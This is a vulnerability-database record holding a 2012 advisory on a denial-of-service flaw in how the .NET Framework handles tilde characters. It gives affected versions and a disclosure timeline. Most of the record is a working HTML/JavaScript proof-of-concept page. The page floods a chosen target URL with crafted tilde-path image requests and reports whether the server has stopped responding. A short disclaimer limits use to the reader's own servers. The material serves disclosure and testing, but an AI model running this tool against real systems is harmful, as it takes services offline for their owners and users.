{"lastseen": "2017-11-19T13:40:14", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "poc", "enchantments": {"score": {"value": -0.6, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "vulnerlab", "idList": ["VULNERABLE:39"]}]}, "exploitation": null, "vulnersScore": -0.6}, "href": "https://www.seebug.org/vuldb/ssvid-73496", "references": [], "enchantments_done": [], "id": "SSV:73496", "title": ".Net Framework Tilde Character DoS", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 5, "sourceData": "\n Paper: http://www.exploit-db.com/wp-content/themes/exploit/docs/19527.pdf\r\n\r\nSecurity Research - .Net Framework Tilde Character DoS\r\n\r\n\r\nWebsite : http://soroush.secproject.com/blog/\r\n\r\n\r\n\r\nI. BACKGROUND\r\n---------------------\r\n\r\n"The .NET Framework is a software framework developed by Microsoft that runs primarily on Microsoft Windows.\r\nIt includes a large library and provides language interoperability\r\nacross several programming languages." (Wikipedia)\r\n\r\nII. DESCRIPTION\r\n---------------------\r\n\r\nVulnerability Research Team discovered a vulnerability\r\nin Microsoft .NET Framework.\r\n\r\nThe vulnerability is caused by a tilde character "~" in a Get request, which could allow remote attackers\r\nto Deny the functionality of the server.\r\n\r\n\r\nIII. AFFECTED PRODUCTS\r\n---------------------------\r\n\r\n.Net Framework 1.0 Windows XP\r\n.Net Framework 1.1 Windows 2003\r\n.Net Framework 2.0 Windows 2003 R2\r\n.Net Framework 3.0 Windows 2008\r\n.Net Framework 3.5 Windows 2008 R2\r\n.Net Framework 4.0 Windows 2008 R2,Windows 7\r\n\r\n\r\nIV. Binary Analysis & Exploits/PoCs\r\n---------------------------------------\r\n\r\nIn-depth technical analysis of the vulnerability and a functional exploit\r\nare available through:\r\n\r\nhttp://soroush.secproject.com/blog/2012/06/microsoft-iis-tilde-character-vulnerabilityfeature-short-filefolder-name-disclosure/\r\n\r\n\r\nV. SOLUTION\r\n----------------\r\n\r\nThere are still workarounds through Vendor and security vendors.\r\n\r\nVI. CREDIT\r\n--------------\r\n\r\nThis vulnerability was discovered by:\r\n\r\nSoroush Dalili (@irsdl)\r\nAli Abbasnejad\r\n\r\n\r\nVII. REFERENCES\r\n----------------------\r\n\r\nhttp://support.microsoft.com/kb/142982/en-us\r\nhttp://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n-----------------------------\r\n\r\n2010-08-01 - Vulnerability Discovered\r\n2010-08-03 - Vendor Informed\r\n2010-12-01 - Vendor 1st Response\r\n2011-01-04 - Vendor 2nd Response (next version fix)\r\n2012-06-29 - Public Disclosure\r\n\r\n\r\nProof of Concept:\r\n\r\n<html>\r\n<head>\r\n<script>\r\nvar requestNumber = 10; // enough for the test - otherwise it may stop your .Net framework completely\r\n\r\nvar tempValue = "A";\r\nwhile(tempValue.length<4000){ // 4096 then!\r\n tempValue+=tempValue;\r\n}\r\n\r\nvar errorFlag;\r\nvar from_time;\r\nvar to_time;\r\n\r\nfunction testTheTarget(strTarget,intValidFolderCount,intLoopNumber,HTMLElementDest){\r\n HTMLElementDest.innerHTML = '';\r\n errorFlag = 0;\r\n from_time = new Date(); \r\n from_time = from_time.getTime(); \r\n if (isTargetValid(strTarget)){\r\n if (isNaN(intValidFolderCount)) intValidFolderCount = 100;\r\n if (isNaN(intLoopNumber)) intLoopNumber = 100;\r\n requestNumber = intLoopNumber;\r\n \r\n\t\tvar div = document.createElement("div");\r\n\t\t\r\n for(var i=0; i<requestNumber;i++){\r\n var testTempValue = tempValue.substring(0,intValidFolderCount-1);\r\n testTempValue = testTempValue.replace(/A/gi,"/~"+Math.floor(Math.random()*10)+"");\r\n testTempValue+=".AsPx?aspxerrorpath=/";\r\n testTempValue="/"+(new Date()).getMilliseconds()+"~"+Math.floor(Math.random()*10) + testTempValue\r\n var img = createElement("img","img_"+i);\r\n if(i==requestNumber-1)\r\n {\r\n img.onerror = function(){\r\n to_time = new Date(); \r\n to_time = to_time.getTime(); \r\n var msecs = (to_time - from_time); \r\n if(!errorFlag && msecs < 100*requestNumber+5000){\r\n errorFlag = 1;\r\n if(intValidFolderCount>=150)\r\n alert('As you can see this message, you probably need to decrease the Maximum Valid Folder number.');\r\n else if(intValidFolderCount>=50){\r\n alert('First increase the Maximum Valid Folder number to see the behaviour, then decrease it to lower than '+intValidFolderCount+' and then see the behaviour.');\r\n }else\r\n alert('The response was too quick. This server probably is not vulnerable.');\r\n }}\r\n }\r\n img.src = strTarget + testTempValue;\r\n div.appendChild(img);\r\n }\r\n HTMLElementDest.appendChild(div); \r\n }else{\r\n alert('Your target URL is not valid. Examples: \\nhttp://www.aspnet-example.com/ \\nor \\nhttps://www.aspnet-example.com/');\r\n }\r\n};\r\n\r\nvar myTargetWindow;\r\nvar objSetTimeout;\r\nfunction openInNewWin(strTarget){\r\n clearTimeout(objSetTimeout);\r\n if(isTargetValid(strTarget)){\r\n myTargetWindow = window.open(strTarget,'_blank');\r\n objSetTimeout = setTimeout('isServerAlive()',10000);\r\n }\r\n}\r\n\r\nfunction isServerAlive(){\r\n try{\r\n var dummy = myTargetWindow.location;\r\n if(myTargetWindow.location.toString().indexOf('//localhost') < 0)\r\n alert('No response from the server! Seems dead to me!');\r\n }catch(e){\r\n // Nothing ... it is alive and safe... \r\n }\r\n}\r\nfunction isTargetValid(strTarget){\r\n var result = false;\r\n try{\r\n if(strTarget.substring(0,7).toLowerCase() == "http://" || strTarget.substring(0,8).toLowerCase() == "https://"){\r\n result = true;\r\n }\r\n }catch(e){}\r\n return result;\r\n};\r\n\r\nfunction createElement(elmType,elmName){\r\n var element;\r\n if(elmName=='')\r\n {\r\n element = document.createElement(elmType);\r\n } else\r\n {\r\n try\r\n {\r\n element = document.createElement('<'+elmType+' name="'+elmName+' id="'+elmName+'">');\r\n } catch (ex)\r\n {\r\n element = document.createElement(elmType);\r\n element.name=elmName;\r\n element.id=elmName;\r\n };\r\n };\r\n return element;\r\n};\r\n\r\n</script>\r\n</head>\r\n\r\n<body>\r\nYou have to monitor the server performance manually:<br/>\r\nTarget website: <input type="text" name="target" id="target" value="http://localhost/"/> Example: http://www.aspnet-example.com/ or https://www.aspnet-example.com/ - Do not include filename<br/>\r\nMaximum valid folder that can be added to your target: <input type="text" name="validfoldercount" id="validfoldercount" value="200"/> before receiving URL Too Long error<br/>\r\nLoop Number: <input type="text" name="loopnumber" id="loopnumber" value="100"/> be careful as it can kill your server.<br/>\r\n<input type="button" value="Test it" onclick="testTheTarget(document.getElementById('target').value,document.getElementById('validfoldercount').value,document.getElementById('loopnumber').value,document.getElementById('playground'))"/>\r\n<input type="button" value="Open the target website" onclick="openInNewWin(document.getElementById('target').value)"/><br/>\r\n<div style="visibility:hidden;" name="playground" id="playground">\r\nHidden Div! -playground-\r\n</div>\r\n<br/><br/><br/><br/>\r\nWe do not accept any responsibility for bad usage of this PoC. Please only run it against your own server/websites.\r\n<br/><br/>\r\nMain reference: <a href="http://soroush.secproject.com/blog/2012/06/microsoft-iis-tilde-character-vulnerabilityfeature-short-filefolder-name-disclosure/">http://soroush.secproject.com/blog/2012/06/microsoft-iis-tilde-character-vulnerabilityfeature-short-filefolder-name-disclosure/</a>\r\n</body>\r\n</html>\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-73496", "type": "seebug", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645555853, "score": 1659785532, "epss": 1678848988}}
.Net Framework Tilde Character DoS